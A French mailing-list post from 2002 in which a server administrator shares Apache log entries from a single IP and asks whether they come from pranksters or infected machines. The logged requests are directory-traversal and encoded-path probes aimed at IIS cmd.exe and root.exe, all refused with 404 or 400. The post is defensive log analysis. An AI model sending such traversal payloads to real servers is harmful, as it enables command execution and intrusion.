(OT) Des requetes http bizaroïdes...
Bonjour,
En analysant les logs d'apache ce matin, je me suis aperçu de quelque
chose plûtot étrange.
grep -c "Feb/2002" access.log donne 3482 résultats.
Jugez plûtot les requêtes:
80.11.49.96 - - [06/Feb/2002:14:45:39 +0100] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:40 +0100] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 274 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:40 +0100] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:44 +0100] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:44 +0100] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:44 +0100] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:45 +0100] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:48 +0100] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:49 +0100] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:49 +0100] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:53 +0100] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:53 +0100] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:54 +0100] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:54 +0100] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:55 +0100] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
"-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:55 +0100] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-"
"-"
Y a des petits malin ou c'est des machines contaminées par
quelquechose ?
Reply to: